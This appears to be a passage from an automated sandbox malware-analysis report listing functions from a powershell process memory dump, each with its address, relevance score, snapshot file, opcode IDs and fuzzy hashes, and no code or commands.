                                                                        Function 000007FE89A9393E Relevance: 2.9, Strings: 2, Instructions: 409COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (be$XhT
                                                                        • API String ID: 0-1561679238
                                                                        • Opcode ID: 809496943b3b7f5620d96f145d356b29eafcf34eb945850ed7809c1a0412effa
                                                                        • Instruction ID: a90c56896d4d5cc82d78dc5b108c31ecd78eeaaec30bdd0c7d7025e59c5e7578
                                                                        • Opcode Fuzzy Hash: 809496943b3b7f5620d96f145d356b29eafcf34eb945850ed7809c1a0412effa
                                                                        • Instruction Fuzzy Hash: CAC1D024A0DBCA0FE756A73818643797FE1EF87254F1900EBD09EC71A3D918AC59C362
                                                                        Function 000007FE89A95C01 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 88M$XhT
                                                                        • API String ID: 0-50409379
                                                                        • Opcode ID: a3d5e61ffd8bb4f52a76a2e9ca3669ad9357d143938d0549614af055ac8dc850
                                                                        • Instruction ID: e9c556fbae60add3bb2a660c8fbef8295f87c6586d3c3a4755de54c03cb03c4e
                                                                        • Opcode Fuzzy Hash: a3d5e61ffd8bb4f52a76a2e9ca3669ad9357d143938d0549614af055ac8dc850
                                                                        • Instruction Fuzzy Hash: E9414731A0CA894FEB56E72C54117B8BBE1FF49340F2810EBC44EC31A3DA15AC55C381
                                                                        Function 000007FE89A9835D Relevance: 2.1, Strings: 1, Instructions: 833COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: XhT
                                                                        • API String ID: 0-3355534747
                                                                        • Opcode ID: a30b68682517e67549f5cc0316125f5d148374ab3ed44702da64f1d1da8bfa8d
                                                                        • Instruction ID: 2a58e6c54c16b3291f8e62b627de053b5b7b908b79d20bc618d0ffed940f0a4c
                                                                        • Opcode Fuzzy Hash: a30b68682517e67549f5cc0316125f5d148374ab3ed44702da64f1d1da8bfa8d
                                                                        • Instruction Fuzzy Hash: EB42C120A0DBCA0FE746A73C58647A57FE1EF5A244F1901EBD48DCB1A3DA18AC56C352
                                                                        Function 000007FE89A95C09 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: XhT
                                                                        • API String ID: 0-3355534747
                                                                        • Opcode ID: e228f08c2a6015c21cd17ec0f45f79c7f45d2a47c918643386e09938f35047ad
                                                                        • Instruction ID: b038a32fc8d32cfc5d5b9dd1030b1b1da74dc2fcc63bfe219c64b18e0592b58a
                                                                        • Opcode Fuzzy Hash: e228f08c2a6015c21cd17ec0f45f79c7f45d2a47c918643386e09938f35047ad
                                                                        • Instruction Fuzzy Hash: 5041592190DBCA0FE716A32C58603A57FF1EF86354F1951EBC88DC70A3DA19AC49C351
                                                                        Function 000007FE89A90F32 Relevance: .4, Instructions: 436COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ea0e949a9efb5ba4eba40e7a6ce48b5f3066804d046db53316ba8983c611dab8
                                                                        • Instruction ID: 05cc8cf1fbfd7ac460495cde077cd4c9e29d1dff19d8091b1244fb03c2b00bea
                                                                        • Opcode Fuzzy Hash: ea0e949a9efb5ba4eba40e7a6ce48b5f3066804d046db53316ba8983c611dab8
                                                                        • Instruction Fuzzy Hash: 68D10530A0DBC90FE74AA76C58506B97FE1FF46388F2801EAD48EC71A3D619AC55C361
                                                                        Function 000007FE89A995C5 Relevance: .4, Instructions: 360COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 51be273ef3d3116ae64f5c5a5f8a43616484a52cae840f108e056b508662f952
                                                                        • Instruction ID: 513c14a455d3f7ccdeb9de9adf76e24bf4a646ea145dc1b4a16b2dd83ecf0020
                                                                        • Opcode Fuzzy Hash: 51be273ef3d3116ae64f5c5a5f8a43616484a52cae840f108e056b508662f952
                                                                        • Instruction Fuzzy Hash: E0A10020A1DBCA0FE347973858647A57FE1EF97244F0901EBD489CB2F3DA289915C362
                                                                        Function 000007FE89A964CB Relevance: .4, Instructions: 350COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4be726fbfd7e07f7cdab3ffd4c2020e6ad2aeb2cf645cb9d1e4c34b5bf0eb2e6
                                                                        • Instruction ID: 840273a78228132ed449ff77a2d57607bee5ac5278ee1774b84cedb13979e471
                                                                        • Opcode Fuzzy Hash: 4be726fbfd7e07f7cdab3ffd4c2020e6ad2aeb2cf645cb9d1e4c34b5bf0eb2e6
                                                                        • Instruction Fuzzy Hash: 99A1253190CB8D0FE74AA72898556AA7FE5FF86354F1401EFE48DC71A3E624AC16C391
                                                                        Function 000007FE89A99CFB Relevance: .3, Instructions: 319COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 277ca3647df195e76fe49ba75c8c3753bf2d18b97e0960c054c4625ba645d8cc
                                                                        • Instruction ID: 62641923c5078e3a624b8677fcdda1416ac2e778ff58b46818f8ce2791fa1c7d
                                                                        • Opcode Fuzzy Hash: 277ca3647df195e76fe49ba75c8c3753bf2d18b97e0960c054c4625ba645d8cc
                                                                        • Instruction Fuzzy Hash: A6910420A1DBC90FEB56A33858647B57FE2FF96249F2801EBD09DC71A3DA18AC15C351
                                                                        Function 000007FE89A92300 Relevance: .1, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f076bb52bdb88229d2801971dff05b96f6d6adecb59a0e3a49abfc8736188f3d
                                                                        • Instruction ID: 9a8980676335897ab60dc1536f9bc07d1aeeec0a546189010f7821b6c02084e5
                                                                        • Opcode Fuzzy Hash: f076bb52bdb88229d2801971dff05b96f6d6adecb59a0e3a49abfc8736188f3d
                                                                        • Instruction Fuzzy Hash: 8921C600A0D6C90FE34BA37C1950265AFC2EF4A399B2910FBD58EC75E3D9085C668362